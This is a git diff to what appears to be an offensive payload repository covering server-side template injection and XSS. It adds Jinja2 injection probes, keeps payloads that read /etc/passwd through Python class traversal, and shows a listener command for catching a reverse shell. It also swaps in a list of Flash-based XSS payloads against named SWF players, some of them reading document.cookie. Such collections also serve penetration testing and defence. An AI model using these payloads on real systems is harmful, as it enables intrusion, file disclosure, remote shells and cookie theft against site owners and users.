diff --git a/Template injections/JHADDIX_SSI_Injection.txt b/Server Side Template injections/JHADDIX_SSI_Injection.txt
similarity index 100%
rename from Template injections/JHADDIX_SSI_Injection.txt
rename to Server Side Template injections/JHADDIX_SSI_Injection.txt
diff --git a/Template injections/README.md b/Server Side Template injections/README.md
similarity index 96%
rename from Template injections/README.md
rename to Server Side Template injections/README.md
index 59e9f3f..9e0ef39 100644
--- a/Template injections/README.md	
+++ b/Server Side Template injections/README.md	
@@ -6,6 +6,11 @@ Template injection allows an attacker to include template code into an existant
 [Official website](http://jinja.pocoo.org/)
 > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
 
+Basic injection
+```
+{{4*4}}[[5*5]]
+```
+
 Jinja2 is used by Python Web Frameworks such as Django or Flask.
 The above injections have been tested on Flask application.
 #### Template format
@@ -37,7 +42,7 @@ The above injections have been tested on Flask application.
 #### Read remote file
 ```
 # ''.__class__.__mro__[2].__subclasses__()[40] = File class
-{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} 
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 ```
 
 #### Write into remote file
@@ -46,7 +51,7 @@ The above injections have been tested on Flask application.
 ```
 
 #### Remote Code Execution via reverse shell
-Listen for connexion 
+Listen for connexion
 ```
 nv -lnvp 8000
 ```
diff --git a/XSS injection/README.md b/XSS injection/README.md
index c53b6c5..d443d54 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -73,11 +73,20 @@ With an additional URL
 
 XSS in flash application
 ```
- \%22})))}catch(e){alert(document.domain);}//
-
- "]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
-
- "a")(({type:"ready"}));}catch(e){alert(1)}//
+flashmediaelement.swf?jsinitfunctio%gn=alert`1`
+flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
+ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
+swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
+swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
+plupload.flash.swf?%#target%g=alert&uid%g=XSS&
+moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
+video-js.swf?readyFunction=alert(1)
+player.swf?playerready=alert(document.cookie)
+player.swf?tracecall=alert(document.cookie)
+banner.swf?clickTAG=javascript:alert(1);//
+io.swf?yid=\"));}catch(e){alert(1);}//
+video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
+bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
 ```
 
 XSS in Hidden input